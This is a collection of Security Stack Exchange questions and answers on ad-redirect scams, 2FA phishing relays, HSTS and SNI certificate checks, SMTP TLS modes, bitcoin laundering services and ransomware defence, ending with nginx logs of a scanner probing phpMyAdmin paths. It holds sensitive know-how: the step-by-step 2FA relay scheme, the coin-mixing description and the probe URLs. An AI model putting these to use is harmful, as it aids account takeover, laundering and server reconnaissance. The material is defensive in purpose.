http:// pixel.everesttech.net /3374/c?ev_sid=3&ev_ln=shoes&ev_lx=kwd-12666661&ev_crx=79908336500&ev_mt=e&ev_n=g&ev_ltx=&ev_pl=&ev_pos=1t1&ev_dvc=c&ev_dvm=&ev_phy=1026481&ev_loc=&ev_cx=333037340&ev_ax=23140824620&url=http://www.zappos.com/shoes?utm_source=google%26utm_medium=sem_g%26utm_campaign=333037340%26utm_term=kwd-12666661%26utm_content=79908336500%26zap_placement=1t1&gclid=CI3vqXXXXXXXXXXXXXBBA
-- 302 -->
http:// www.zappos.com /shoes?gclid=CI3vXXXXXXXXXXXXXMBBA&utm_source=google&utm_medium=sem_g&utm_campaign=333037340&utm_term=kwd-12666661&utm_content=79908336500&zap_placement=1t1 Obviously, Google has strict destination requirements for ad links in place and an ordinary customer won't get their ad approved if they set the link target to a completely different domain. But scammers do occasionally find ways around the vetting process.
At least, Google's policy about "destination mismatches" is pretty clear: The following is not allowed: Ads that don't accurately reflect where the user is being directed
[...] Redirects from the final URL that take the user to a different domain [...] Trusted third-party advertisers may be permitted to issue cross-domain redirects, though. Some of the exceptions are listed here , e.g.: An example of an allowed redirect is a company, such as an AdWords
Authorized Reseller, using proxy pages. [...] For example: Original website: example.com Proxy website: example.proxydomain.com We allow the company to use "example.proxydomain.com" as the final
URL, but retain "example.com" as the display URL. One major weak spot is that Google doesn't control the third-party redirectors (in above example, that's pixel.everesttech.net ). After Google has vetted and approved their ads, they could simply start redirecting to a different domain without immediately getting noticed by Google. It's possible that, in your case, attackers managed to compromise one of these third-party services and pointed their redirects to the scam site. In recent months, there have been several press reports about an almost identical scam pattern, e.g. this report about a fraudulent Amazon ad whose display URL spells out amazon.com but redirects to a similar tech support scam. (By now, your discovery has also been picked up by a few news sites, including BleepingComputer .) | {
"source": [
"https://security.stackexchange.com/questions/161071",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/59311/"
]
} |

161,403 | Detailed in the latest NSA dump is a method allegedly used by Russian intelligence to circumvent 2FA. (In this instance Google 2FA with the second factor being a code.) It’s a fairly obvious scheme and one that I’m sure must be used regularly.
It appears to work like this: URL is sent to target via spear phishing, the URL points to attacker
controlled phishing website that resembles Google Gmail. User send credentials to the phony Gmail. (Assumption) Attacker enters credentials into legitimate Gmail, and checks if a second factor is required. Target receives legitimate second factor. Phony Gmail site prompts target for second factor. Target sends second factor. Attacker enters second factor into legitimate site and successfully authenticates. The only way I can see to defend against this attack is by spotting the phony site as being a scam or blocking the phishing site via FW’s, threat intel etc. Is there any other practical way to defend against such a scheme? | Not all two-factor authentication schemes are the same. Some forms of 2FA, such as sending you a text message, are not secure against this attack. Other forms of 2FA, such as FIDO U2F, are secure against this attack -- they have been deliberately designed with this kind of attack in mind. FIDO U2F provides two defenses against the man-in-the-middle attack: Registration - The user registers their U2F device with a particular website ("origin"), such as google.com . Then the U2F device will only respond to authentication requests from a registered origin; if the user is tricked into visiting goog1e.com (a phishing site), then the U2F won't respond to the request, since it can see that it is coming from a site that it hasn't been previously registered with. Channel ID and origin binding - U2F uses the TLS Channel ID extension to prevent man-in-the-middle attacks and enable the U2F device to verify that it is talking to the same web site that the user is visiting in their web browser. Also, the U2F device knows what origin it thinks it is talking to, and its signed authentication response includes a signature over the origin it thinks it is talking to. This is checked by the server. So, if the user is on goog1e.com and that page requests a U2F authentication, the response from the U2F device indicates that its response is only good for communication with goog1e.com -- if the the attacker tries to relay this response to google.com , Google can notice that something has gone wrong, as the wrong domain name is present in the signed data. Both of these features involve integration between the U2F two-factor authentication device and the user's browser. This integration allows the device to know what domain name (origin) the browser is visiting, and that allows the device to detect or prevent phishing and man-in-the-middle attacks. Further reading on this mechanism: An excerpt from the FIDO U2F spec, regarding defenses against MITM attacks. Yubico's explanation of the protocol flows. | {
"source": [
"https://security.stackexchange.com/questions/161403",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/83641/"
]
} |
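The origin binding described above ultimately comes down to a small server-side check on the signed client data. A sketch of that step in WebAuthn terms, U2F's successor (field names follow the clientDataJSON structure; the expected origin is a placeholder, and signature verification over this data is omitted here):

import base64
import json

EXPECTED_ORIGIN = "https://accounts.example.com"   # placeholder relying-party origin

def b64url_decode(data: str) -> bytes:
    return base64.urlsafe_b64decode(data + "=" * (-len(data) % 4))

def client_data_acceptable(client_data_json: bytes, issued_challenge: bytes) -> bool:
    # The authenticator's signature covers a hash of this JSON, so a
    # man-in-the-middle cannot rewrite the origin without breaking it.
    client_data = json.loads(client_data_json)
    if client_data.get("type") != "webauthn.get":
        return False
    if client_data.get("origin") != EXPECTED_ORIGIN:
        # An assertion produced on a phishing page names that page's origin,
        # so relaying it to the real site fails at this point.
        return False
    return b64url_decode(client_data.get("challenge", "")) == issued_challenge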
161,838 | I apologise for to terseness of this question; I have an issue. Google.co.uk is failing its HSTS on my browsers. Is this an issue with google.co.uk or is this just me? Is someone middle-manning my internet connection? While I can find plenty of sites that tell me google.co.uk is working I haven't been able to establish if the HSTS issue is me or Google. I suspect it's me but would like some 3rd party confirmation. P.S.: This appears so far just for google.co.uk, and unfortunately snuck.me doesn't seem to be working to clarify other sites' non-HSTS certificates either. Update: After ten minutes of being down, google.co.uk now works again, however by using snuck.me I find the following: Fingerprint according to the browser: D1:8F:DE:83:4A:68:88:32:DD:CF:C8:6B:0C:74:94:33:02:75:BC:43 finger print according to snuck.me: 42:38:CE:6C:AA:C5:FE:13:A0:5A:56:88:F3:F2:E7:E4:D7:14:07:DA Does this confirm I have a MITM? | Your browser rejected a certificate, but this doesn't have to be caused by an attack. Google.co.uk is failing its HSTS on my browsers. The warning you see doesn't indicate a problem with HSTS in particular. It's just Firefox saying: "The certificate appears invalid. And by the way, we won't let you add a manual exception because the site uses HSTS." 1 There are many plausible reasons why you got served an invalid certificate for a short amount of time. It could be a hickup at your ISP, a problem with your router, SSL interception by a captive portal (as mentioned by @FedericoPoloni) or, theoretically, a poor attempt at an MITM attack. The first step of investigation would be to check which certificate you were actually served. Afterwards, you didn't correctly compare the certificates: You connected to www.google.co.uk but ran the third-party test against google.co.uk . These are technically different domains that serve different certificates depending on the indicated server name. Here I'm testing each -servername with openssl and you should recognize both fingerprints: $ openssl s_client -servername www.google.co.uk -connect www.google.co.uk:443 < /dev/null 2>/dev/null | openssl x509 -fingerprint -noout -in /dev/stdin
SHA1 Fingerprint=D1:8F:DE:83:4A:68:88:32:DD:CF:C8:6B:0C:74:94:33:02:75:BC:43
$ openssl s_client -servername google.co.uk -connect www.google.co.uk:443 < /dev/null 2>/dev/null | openssl x509 -fingerprint -noout -in /dev/stdin
SHA1 Fingerprint=42:38:CE:6C:AA:C5:FE:13:A0:5A:56:88:F3:F2:E7:E4:D7:14:07:DA 1 HSTS (HTTP Strict Transport Security) is a header which web servers can send to indicate that clients should never connect to the site over plain HTTP (for a specified amount of time). Your browser picked up that header during one of your previous visits to www.google.co.uk or preloaded it. One of the header's side effects is that the UI won't allow you to ignore certificate warnings anymore by adding an exception. | {
"source": [
"https://security.stackexchange.com/questions/161838",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/82333/"
]
} |
161,924 | I stumbled something interesting today when I was adding an account to my gmail one. Why is SSL boldly stated as recommended when TLS supersedes SSL? The links for SSL and TLS is the same: https://support.google.com/mail/answer/22370?hl=en | From that link: Select a secured connection Check with your other mail service for their recommended port number and authentication type. Here are some common combinations: SSL with port 465 TLS with port 25 or 587 The difference, then, is that "SSL" means SMTP over SSL-or-TLS on port 465, and "TLS" means SMTP with STARTTLS on port 25 or 587. So what's the difference between them? STARTTLS is opportunistic encryption. The connection starts as plaintext SMTP, and the client tries to initiate encryption if the server says that it can. The problem with this is that the plaintext negotiation can be relayed and modified by a Man-in-the-Middle attacker, exactly the way that sslstrip works for HTTP redirects and links to HTTPS. SMTP-over-SSL, on the other hand, starts with a SSL (or TLS--the exact protocol is negotiated) connection, then SMTP is conducted over that tunnel. With this configuration, the client always expects to use SSL, and can't be tricked into going plaintext. So the SSL-or-TLS naming is not the real issue. Google is using "SSL" to mean the older "smtps" standard, which is actually more secure in this case. In reality, the service is probably using TLS, and Google's mail servers will negotiate the most secure connection possible, depending on the other service. EDIT: As @Mehrdad points out in the comments, Google will change which option is "recommended" based on the port number that is selected in the dropdown. This shows that their recommendation is not based on higher assurance of encryption, but on what is most likely to work: port 465 is registered with IANA as 'smtps', and is expected to be SMTP-over-SSL. Ports 25 and 587 are 'smtp' and 'submission' respectively, and are expected to be plaintext. Since I doubt that Google will refuse to send mail over these ports if STARTTLS cannot be negotiated, "TLS" remains the weaker, opportunistic option. It is, however, more likely to be supported than port 465. EDIT 2: @grawity did the legwork and determined that Google does not, in fact, fall back to plaintext SMTP if STARTTLS is not supported. You have to explicitly select the "Unsecured" option when configuring the server. This is really good work by Google to ensure transport security for emails. Of course, all that has been said already about STARTTLS remains true: it requires this extra step of making TLS a strong requirement to avoid downgrade attacks. | {
"source": [
"https://security.stackexchange.com/questions/161924",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/122806/"
]
} |
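The two options map onto the two ways a mail library opens the connection. A short sketch with Python's smtplib (the server name is a placeholder) showing implicit TLS on port 465 versus an explicit STARTTLS upgrade on port 587:

import smtplib
import ssl

HOST = "smtp.example.com"                 # placeholder mail server
context = ssl.create_default_context()    # verifies the server certificate

# "SSL" in Google's wording: the socket speaks TLS from the first byte
# (port 465), so there is no plaintext phase for an attacker to tamper with.
with smtplib.SMTP_SSL(HOST, 465, context=context) as smtp:
    smtp.noop()

# "TLS" in Google's wording: the session starts as plaintext SMTP (port 587)
# and is upgraded with STARTTLS.  Calling starttls() unconditionally, and
# treating any failure as fatal, avoids the downgrade problem described above.
with smtplib.SMTP(HOST, 587) as smtp:
    smtp.starttls(context=context)
    smtp.noop()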
162,021 | Suppose that someone stole my password; he/she could easily change it by confirming the old password. So I am curious why we need that step, and what is the purpose of the old password confirmation? | If you are logged in and I sit down at your computer, I can lock you out of your account and transfer ownership to myself. | {
"source": [
"https://security.stackexchange.com/questions/162021",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/26034/"
]
} |
162,090 | If all the computers use the same operating system, attackers only need to focus on one operating system, would it be unsafe? | In 2003, Dan Geer from @Stake published a seminal paper on this very topic - Cyber In security: The Cost of Monopoly . Surprisingly (given that he was employed by Microsoft at the time) he comes squarely down into the camp claiming that diversity is vital to security (emphasis mine): Regardless of the topic – computing versus electric power generation
versus air defense – survivability is all about preparing for failure
so as to survive it. Survivability, whether as a concept or as a
measure, is built on two pillars: replicated provisioning and
diversified risk.... ...redundancy has little ability to protect against cascade
failure; having more computers with the same vulnerabilities cannot
help if an attack can reach them all. Protection from cascade failure
is instead the province of risk diversification – that is, using more
than one kind of computer or device, more than one brand of operating
system, which in turns assures that attacks will be limited in their
effectiveness. This fundamental principle assures that, like farmers
who grow more than one crop, those of us who depend on computers will
not see them all fail when the next blight hits. This sort of
diversification is widely accepted in almost every sector of society
from finance to agriculture to telecommunications. (He went on to conclude that Microsoft was a threat insofar as it introduced a monoculture; which turned out to be a Career Limiting Move for him at Microsoft.) In the comments, @Johnny suggests that this is a credentialist answer. While I've chosen to quote a respected professional's well-written paper here, I do so because it mirrors my 20+ years of experience in the computer and security industry. (Which, heck, almost seems like secondary credentialism. But I'm just saying that I'm referencing rather than parroting). For example, the 3-tier (web/app/db) architecture became a widely accepted improvement in security terms a long time ago, because the separation between differing functions helped enforce security. In that vein, my experience has been that there is a tradeoff between the additional work setting up heterogenous systems (say, IIS with a MySQL-on-Linux backend) and the additional benefit of diversity when attacks (or patches!) introduce disruption into the stack. And that I've regretted having a larger problem more times than I regretted the extra work :) Virgin field epidemics - either because you're not segmenting your networks, or because you're using the same passwords, or you've only got one [DNS/Hosting/Network] provider, or because you're using the same OS everywhere - all end badly. | {
"source": [
"https://security.stackexchange.com/questions/162090",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/151126/"
]
} |
162,420 | I run a small business out of my home and I'm not really doing anything labor intensive, no games and I'm not cutting any code or anything of that nature. A lot of what I do is phone based sales, so I'm basically just accessing my web based work gmail account, sending PDF contracts out to be e-signed and storing those on cloud based drive and a lot of browsing for info, finding leads etc. I could probably get away with a thin client but I just bought a cheap laptop, and I am curious to know if I'm on the right track here by thinking that Virtualbox for everyday business is my best option for security and usability for just one desktop running Windows 10 (and if so maybe I should go with a lighter weight OS). | By using the same VM for browsing, word documents, and email, you are exposing all of your data to the same level of risk. Instead of doing all of this activity in the VM, consider doing your browsing and email in the VM, but the contract work and bookkeeping stuff on the host OS. That way if you get phished, the attack is limited to the VM, and can't do really nasty stuff like encrypt your docs and hold them for ransom. | {
"source": [
"https://security.stackexchange.com/questions/162420",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/151357/"
]
} |
162,583 | A bitcoin transaction has details of the incoming address as well as the outgoing address (where the bitcoins are being transferred), so my question is why that outgoing address has not done anything in tracking down ransomware attackers, like the WannaCry authors? | There is a chance that once the bitcoins have been converted into ‘real money’ or ‘real assets’ the ledger could leak information on the owners of those bit coins. But even then tracking and attribution can be very complex, but in answer to your question the reason in this case is probably that the attacker(s) haven’t ‘cashed’ them in yet. Depending on who carried out the attack they may never do anything with the bitcoin they have as their attack may not have been financially motivated. There are ways to launder bitcoins using services such as Bitlaundry, Bitmix or Bitcoinlaundry. These laundry services work as follows: (credit to the description below) Imagine that Alice wishes to send bitcoins to Bob. Bob, sadly, is not well liked. Alice would rather not have anyone know that she sent Bob bitcoins. So, Alice puts Bob's address in the form at BitLaundry. Alice gets a one-time-use address from BitLaundry. Alice sends the money to that address. BitLaundry sends money out to recipients every 30 minutes. (But, it doesn't send out Alice's money immediately, that might be suspicious..) So, a random number of 30 minute segments later, BitLaundry sends the money out to Bob. BitLaundry then deletes the database link between the one-time-use address and Bob. Alice has sent money to BitLaundry, but people do this all the time. She's one of many. BitLaundry has sent money to Bob, but BitLaundry has sent money out to a whole bunch of other people as well. Alice and Bob are much less linked than they would have been otherwise. | {
"source": [
"https://security.stackexchange.com/questions/162583",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/151692/"
]
} |
162,690 | I bought brand new HTC Desire 526G with operating system 4.4.2 (Kitkat), everything is as it should be (not rooted) so it is still on factory settings. But now I didn't get for a long time any security updates, I have checked manually in system updates and it says: There are no updates available for your phone. If I check my Android version it says: 4.4.2 & Android security patch level: 2016-01-01 , but in a same time if I go on CVE details, I founded a lot of vulnerabilities for this system. Also I have installed X-Ray from Duo Security to check if my system is vulnerable to any exploits and it gave me positive result, that my device is vulnerable to different ones. What can I do in my situation, I mean how can I update my Android device in order to protect it from publicly known vulnerabilities? | You are essentially asking what to do if you are using software which is known to be vulnerable but where no updates are available. This is a problem not restricted to Android phones but you'll find it everywhere, for example in IoT devices like routers or cameras but also with software on the PC which only get support for a limited time. The answer should be obvious: either replace the software (or device) with one with no known vulnerabilities (and still getting updates) or reduce the risk of infection by decreasing the attack surface. In the case of an Android phone the best option would probably be to get alternative and still supported software like LineageOS for it. If no alternative software supports your device you might need to get a new phone with still supported software and this time hopefully from a vendor known for better support. If none of this is possible or if the costs don't match the assumed risk you could decrease the attack surface to reduce the risk of an exploit against your device. This can be done by having no network connection (neither mobile, WiFi nor Bluetooth) and removing all apps you don't really need. In case you have root on the phone you could also install some firewall on it to restrict network traffic to only a few selected apps. Note that there is no perfect security even with supported software. How much effort and cost you invest for protection depends a lot on what you need to protect. If there are no sensitive data on the device you might accept a limited risk by using it in mobile network and maybe in a restricted WiFi network (so that it cannot be used to exploit other systems in your home network). If instead you have sensitive data on the device you should probably invest some more and get a still supported device from a vendor with fast updates. | {
"source": [
"https://security.stackexchange.com/questions/162690",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/134969/"
]
} |
162,874 | I'm planning on encrypting a large media library of mine. Have looked into different solutions, but thought I should ask the community what your thoughts are. I don't want to encrypt each file individually, I'd like to create a container which I decrypt once when mounting. I have 1.4 TB of data consisting mainly of 2-4 GB files, though some files exceed 4 GB (meaning zipping isn't an option). Ideally I'd like the solution to be cross platform (even if that means command line only). My current best solution is to use GPG. I would create a tarball of my 1.4 TB directory then encrypt that file with my GPG key. Though I don't have much expertise in compression, I would think this isn't ideal to tar 1.4 TB. Which also means browsing the files will be cumbersome, unless I untar which would double the storage needed along with many other downsides. Do you have any suggestions for other ways I should go about this?
I don't need the solution to be incredibly secure, prioritising convenience for this use case. More Info: I currently use OSX's built-in encryption method of creating a .dmg and mounting it to access the contents. Hoping for a cross-platform version of this. | Why not use a commonly used application to do it? VeraCrypt is a good choice as it replaced the respected TrueCrypt application and allows you to create an encryption container that you mount as a drive. | {
"source": [
"https://security.stackexchange.com/questions/162874",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/151981/"
]
} |
162,957 | I'm not sure this is the right place, but figured people would find it useful if they aren't too familiar with security policies and general best practices. There is a lot of information out there, however, we all know that you can't completely lock down a system because people need access to various outside sources. So as a Cyber Security forum (of sorts), what would your recommendations be to combat this latest Petya and NotPetya ransomware attack? Edit: it would also be useful to know what allowed the affected companies' systems to be infected. | I think one of the main lessons learned is that the security services shouldn’t be hoarding zero days and tools to exploit them, (especially) if they can’t properly secure them. The thing to remember, however, is that WannaCrypt and Petya both had patches available before they hit and both also took advantage of poor configuration. Additionally, many organisations that were hit hard could have avoided some (possibly all) pain if they had standard belts and braces security practices in place. The main lesson organisations should learn is that they should get the basics right. For example: Vulnerability Management Conduct regular vulnerability scanning, understand the security posture of all assets and what vulnerabilities are present, what threats are related to these vulnerabilities, and what risk they pose to the IT estate and the business it serves. This includes both missing patches (i.e. MS17-010) and poor configuration (i.e., having SMBv1 enabled). This should all be supported by proper processes that allow for ongoing discovery, remediation of vulnerabilities (either via action or risk acceptance) and confirming remediation. Ideally, all risks across the entire IT estate should be known about and managed. Additionally, roles and responsibilities should be assigned to ensure that all of the above is done correctly. This includes security managers, security analysts, vulnerability managers IT technicians etc. Patch Management Ensure that patches are deployed in a timely manner. This doesn’t just mean pushing the latest Patch Tuesday patches. This also includes understanding what software you have in your IT estate and having a full inventory of assets to make sure everything is patched. Removable Media Controls Ensure removable media is limited to devices that are sanctioned only. Ideally, I would blacklist all removable media and whitelist anything that you approve. (This is just my view, however) Malware Prevention Ensure you have some kind of AV on all end points, at least the classic heuristics and definition based AV. (although there are more advanced solutions available) Make sure it is up to date and working. Disaster Recovery Ensure you have backups, including off-site, off-line backups of critical data. Incident Management Ensure you have a plan to react to a major security incident; ensure you have the right people in the right places supported by the right processes. Control User Privilege This one goes without saying really: make sure that all users have the least amount of privilege. This should be supported to ensure that this is audited regularly. User Education and Engagement Ensure all staff understand the security policy of your organisation. Conduct exercises such as phishing campaigns to test your users and provide training to allow them to understand the risks involved and be better prepared to spot pushing emails, web sites, social engendering etc. 
(Again, this is just a view, some people may suggest that security shouldn’t be a user problem; it should be an IT problem) Good Network Security Hygiene Have the correct access controls on your perimeter, ensure you have properly configured firewalls at all appropriate places in your network (with regular rule audits and reviews), and make sure that VLANS are properly setup with as much segmentation as is required. Ensure that all remote users can connect securely and that any devices they connect from have at least 1-to-1 patch levels as devices already on the network. Also, make sure that you have robust BYOD controls. | {
"source": [
"https://security.stackexchange.com/questions/162957",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/59883/"
]
} |
162,970 | I have a JavaScript web application that communicates with an API on a different subdomain. The HTML and Javascript are all hosted in S3. A conventional CSRF token is put into the body of the HTML page and either used by a form or read by JavaScript; but as the HTML is statically hosted this isn't possible in my case. Is it safe to request a CSRF token from the server during application startup with an AJAX request? The resulting token could then be attached as a header to all of the future requests to the API. Is there a better solution to protecting against CSRF attacks in my architecture? | I think one of the main lessons learned is that the security services shouldn’t be hoarding zero days and tools to exploit them, (especially) if they can’t properly secure them. The thing to remember, however, is that WannaCrypt and Petya both had patches available before they hit and both also took advantage of poor configuration. Additionally, many organisations that were hit hard could have avoided some (possibly all) pain if they had standard belts and braces security practices in place. The main lesson organisations should learn is that they should get the basics right. For example: Vulnerability Management Conduct regular vulnerability scanning, understand the security posture of all assets and what vulnerabilities are present, what threats are related to these vulnerabilities, and what risk they pose to the IT estate and the business it serves. This includes both missing patches (i.e. MS17-010) and poor configuration (i.e., having SMBv1 enabled). This should all be supported by proper processes that allow for ongoing discovery, remediation of vulnerabilities (either via action or risk acceptance) and confirming remediation. Ideally, all risks across the entire IT estate should be known about and managed. Additionally, roles and responsibilities should be assigned to ensure that all of the above is done correctly. This includes security managers, security analysts, vulnerability managers IT technicians etc. Patch Management Ensure that patches are deployed in a timely manner. This doesn’t just mean pushing the latest Patch Tuesday patches. This also includes understanding what software you have in your IT estate and having a full inventory of assets to make sure everything is patched. Removable Media Controls Ensure removable media is limited to devices that are sanctioned only. Ideally, I would blacklist all removable media and whitelist anything that you approve. (This is just my view, however) Malware Prevention Ensure you have some kind of AV on all end points, at least the classic heuristics and definition based AV. (although there are more advanced solutions available) Make sure it is up to date and working. Disaster Recovery Ensure you have backups, including off-site, off-line backups of critical data. Incident Management Ensure you have a plan to react to a major security incident; ensure you have the right people in the right places supported by the right processes. Control User Privilege This one goes without saying really: make sure that all users have the least amount of privilege. This should be supported to ensure that this is audited regularly. User Education and Engagement Ensure all staff understand the security policy of your organisation. Conduct exercises such as phishing campaigns to test your users and provide training to allow them to understand the risks involved and be better prepared to spot pushing emails, web sites, social engendering etc. 
(Again, this is just a view, some people may suggest that security shouldn’t be a user problem; it should be an IT problem) Good Network Security Hygiene Have the correct access controls on your perimeter, ensure you have properly configured firewalls at all appropriate places in your network (with regular rule audits and reviews), and make sure that VLANS are properly setup with as much segmentation as is required. Ensure that all remote users can connect securely and that any devices they connect from have at least 1-to-1 patch levels as devices already on the network. Also, make sure that you have robust BYOD controls. | {
"source": [
"https://security.stackexchange.com/questions/162970",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/10023/"
]
} |
163,152 | I was wiping and restoring a family member's Android phone today, as it was running slowly with loads of apps on it. I decided to back up their WhatsApp messages to Google Drive in order to recreate their chat history easily after the wipe. On the phone, I noticed this message from WhatsApp: Important: Media and messages you back up are not protected by WhatsApp end-to-end encryption while in Google Drive. The same message is also available here, at the end of the section for Creating a Google Drive Backup : https://faq.whatsapp.com/en/android/28000019 Does this mean that if I have been chatting to anyone in the past, and that person has periodic Google Drive backups enabled, then my conversation is compromised to Google and/or WhatsApp? If this is the case then it actually makes end-to-end encryption on WhatsApp useless unless the person you're chatting to swears that they don't have Google Drive backup enabled on their end. We might as well just use server-side encryption. Or is the message given by WhatsApp badly expressed and ambiguous? | You're confusing message integrity and security with secrecy. WhatsApp provides end to end encryption, meaning the message you send can only be read by the recipient and vice versa. This protects you from third parties trying to eavesdrop on your conversation, and even prevents WhatsApp themselves from reading the messages. You can't demand WhatsApp to allow you to wiretap a conversation if WhatsApp themselves have no idea what's being sent. However once the message is in the hands of the recipient, it's a different story. In order for it to appear in their chat history, it has to be saved on the phone. If a persons device is compromised, so is your chat history with that person. The person could also screenshot your conversation, or even use another phone to take a picture of your conversation. Backup to Google Drive is simply a way of backing up your chat history so if you change devices or reset your phone all your messages aren't gone. Once the conversation is in Google Drive however, if a valid law enforcement request is made for your files, your conversation is now compromised, as Google only provides server side encryption, which allows them to decrypt your files. This even opens you up to further compromise if the recipients Google account was ever hacked, as the hackers would have access to your message history with that person. In short, no, the warning is accurate . It's not ambiguous, it tells you exactly what it means, if you save the messages to Google Drive, anyone with access to that account can retrieve the messages. This all boils down to the level of trust you have in your recipient. If you're not 100% sure that the person you're talking to isn't going to rat you out, best not to voice your dissent of your government to them. | {
"source": [
"https://security.stackexchange.com/questions/163152",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/134406/"
]
} |
163,327 | I just went to reset my Western Digital password and they emailed me my plaintext password, instead of providing online form to let me change it. This is really concerning to me as the site accepts/processes payments for their drives, and I have previously made payments on this site. As a countermeasure to this, I am treating that password used on this site as if it was already leaked, and am ensuring new and unique password for every other site I used it on. Just to be sure. What is the best way to address this in a way that would have the highest chance of successfully encouraging them to correct their password policy? | If they process payments via credit card, they must maintain PCI-DSS compliance. You could always report a violation . They could potentially send an auditor and insist on remediations. The whole process would take probably a year or more. It would not surprise me if they are already working on it, assuming you have found a bona fide issue. | {
"source": [
"https://security.stackexchange.com/questions/163327",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/79540/"
]
} |
164,836 | Earlier today, Lone Learner asked Why is there no certificate error while visiting google.net although it presents a certificate issued to google.com? The accepted answer explains that the issue was caused by an SNI Hole . You've fallen into a "SNI hole". Google will present a different certificate if there is no "Server Name Indication" given in the client's TLS handshake part. - StackzOfZtuff The top search result for "What is an SNI Hole" is the question page for What are the security implications of enabling a SNI-hole on a web server? , which isn't much help for those unfamiliar with the term. What exactly is an SNI Hole? | SNI ( Server Name Indication ) is a TLS (Transport Layer Security) extension in which the client presents the server the domain name for the target it wants to access within the TLS handshake. It is used in cases where there are multiple virtual servers with different certificates on the same IP address, so that the server can present the correct certificate. Insofar it is similar to the HTTP host header in the HTTP request, which is used to select the matching virtual host configuration - only the Host header cannot be used to select the certificate since it is sent inside the HTTP request. (i.e. after the TLS handshake is already done). Since the SNI TLS extension is optional, some clients may not send this extension. This is the case with openssl s_client without the -servername argument, but also with many TLS libraries in different programming languages. And while all modern browsers use SNI, older browsers like IE8 on XP do not use it. If such a client connects to a server which has multiple certificates, the server does not know which certificate the client actually needs, i.e. the client falls into the "SNI hole" by not using the SNI extension. In this case the server usually either sends an error back (or sometimes just closes the connection) or uses a default certificate explicitly or implicitly configured for this purpose. | {
"source": [
"https://security.stackexchange.com/questions/164836",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/141087/"
]
} |
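To see the "SNI hole" described above in practice, here is a minimal Python sketch. It assumes the third-party cryptography package is installed and that the example host is reachable; it connects twice, once sending SNI and once omitting it, and prints the subject of whichever certificate the server presents in each case.

    import socket
    import ssl
    from cryptography import x509  # assumed installed: pip install cryptography

    def fetch_cert_subject(host, port=443, send_sni=True):
        # Verification is disabled so the handshake still succeeds when the
        # server falls back to a default certificate for the "wrong" name.
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        with socket.create_connection((host, port), timeout=10) as sock:
            # server_hostname=None means no SNI extension is sent at all.
            with ctx.wrap_socket(sock, server_hostname=host if send_sni else None) as tls:
                der = tls.getpeercert(binary_form=True)
        cert = x509.load_der_x509_certificate(der)
        return cert.subject.rfc4514_string()

    if __name__ == "__main__":
        host = "www.google.net"   # example host from the linked question
        print("with SNI:   ", fetch_cert_subject(host, send_sni=True))
        print("without SNI:", fetch_cert_subject(host, send_sni=False))

If the server distinguishes the two cases, the second call shows the default certificate handed to clients that fall into the SNI hole.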
165,131 | If I am able to access a database and delete all the files which a web app would read, would that be considered a Denial of Service attack? It is not a duplicate of the question in the following link, since the hypothesis is different although the outcome may be equivalent: Is unauthorised deletion an integrity or availability issue? | Yes, in the sense that anything which "denies service" is a "denial of service". The CIA Triad defines information security as anything which affects the Confidentiality, Integrity, or Availability of the system or its data. As pointed out in comments, this is not always an "attack", since it's just as likely to be accidental. Whether this is the result of a malicious attack, an admin botching a patch install, or the building catching fire, DoS due to data loss is definitely a security risk for which organizations should have a plan in place. Assuming it is an intentional attack: if they have enough access to the backend server to delete db files, then there are far more subtle and nefarious things they could do (like stealing the db, selectively deleting data, planting a network sniffer, etc.), so a DoS is pretty much the least dangerous thing in the category of "attacker has write-access to the server's filesystem", which is why "deleting the database" is to "DoS" as "canoe" is to "vehicle": not the first thing that comes to mind, but technically counts. | {
"source": [
"https://security.stackexchange.com/questions/165131",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/104296/"
]
} |
165,338 | This morning I checked our nginx logs. 46.x.x.90 - - [17/Jul/2017:05:51:31 +0000] "HEAD http://x.x.71.1:80/PMA2011/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:31 +0000] "HEAD http://x.x.71.1:80/PMA2012/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:31 +0000] "HEAD http://x.x.71.1:80/PMA2013/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:32 +0000] "HEAD http://x.x.71.1:80/PMA2014/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:32 +0000] "HEAD http://x.x.71.1:80/PMA2015/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:32 +0000] "HEAD http://x.x.71.1:80/PMA2016/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:32 +0000] "HEAD http://x.x.71.1:80/PMA2017/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:32 +0000] "HEAD http://x.x.71.1:80/PMA2018/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:32 +0000] "HEAD http://x.x.71.1:80/pma2011/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:32 +0000] "HEAD http://x.x.71.1:80/pma2012/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
46.x.x.90 - - [17/Jul/2017:05:51:33 +0000] "HEAD http://x.x.71.1:80/pma2013/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 Jorgee" "-"
